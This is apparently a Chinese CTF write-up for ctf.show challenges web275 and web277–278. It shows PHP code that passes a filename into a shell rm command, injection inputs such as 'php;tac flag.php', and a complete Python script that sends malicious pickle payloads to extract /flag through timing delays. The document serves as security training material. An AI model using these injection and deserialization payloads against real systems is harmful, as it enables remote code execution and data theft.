web275
这道题和序列化一点关系都没有
整个代码并没有说filename(f)怎么传参只有fn并且屏蔽了flag
highlight_file(__FILE__);
class filter{
public $filename;
public $filecontent;
public $evilfile=false;
public function __construct($f,$fn){
$this->filename=$f;
$this->filecontent=$fn;
}
public function checkevil(){
if(preg_match('/php|\.\./i', $this->filename)){
$this->evilfile=true;
}
if(preg_match('/flag/i', $this->filecontent)){
$this->evilfile=true;
}
return $this->evilfile;
}
public function __destruct(){
if($this->evilfile){
system('rm '.$this->filename);
}
}
}
if(isset($_GET['fn'])){
$content = file_get_contents('php://input');
$f = new filter($_GET['fn'],$content);
if($f->checkevil()===false){
file_put_contents($_GET['fn'], $content);
copy($_GET['fn'],md5(mt_rand()).'.txt');
unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
echo 'work done';
}
}else{
echo 'where is flag?';
}
$content = file_get_contents('php://input')
$f = new filter($_GET['fn'],$content);
GET :
?fn=php;ls
?fn=php;tac flag.php
这里其实就可以理解为我传fn为文件名,文件内容$content就是输入流得到的内容就是;后面的内容,但是作者这里用了两个fn来混淆,filter的fn是文件内容,但是外面的这个fn是文件名
$this->filename=$f;
$this->filecontent=$fn;
web277–web278
python序列化,EXP
import requests
import time
import string
import pickle
import base64
result=""
str="_-{}"+string.ascii_letters+string.digits #大小写字母和数字
url="http://e8eaffdd-233c-4c5d-82d0-79a89a515df3.challenge.ctf.show/backdoor?data="
payload="__import__('os').popen('if [ `cat /flag|cut -c {0}` == {1} ];then sleep 3;fi').read()"
class Rce():
def __init__(self,payload):
self.code=payload
def __reduce__(self):
# print(self.code)
return (eval,(self.code,))
length=50 #length长度
key=0
for j in range(1,length):
if key==1:
break
for n in str:
rser = bytes.decode(base64.b64encode(pickle.dumps(Rce(payload.format(j,n)))))
target=url+rser
# print(target)
try:
requests.get(target,timeout=(2.5,2.5))
except:
result=result+n
print(result)
break
# if n=='9':
# key=1
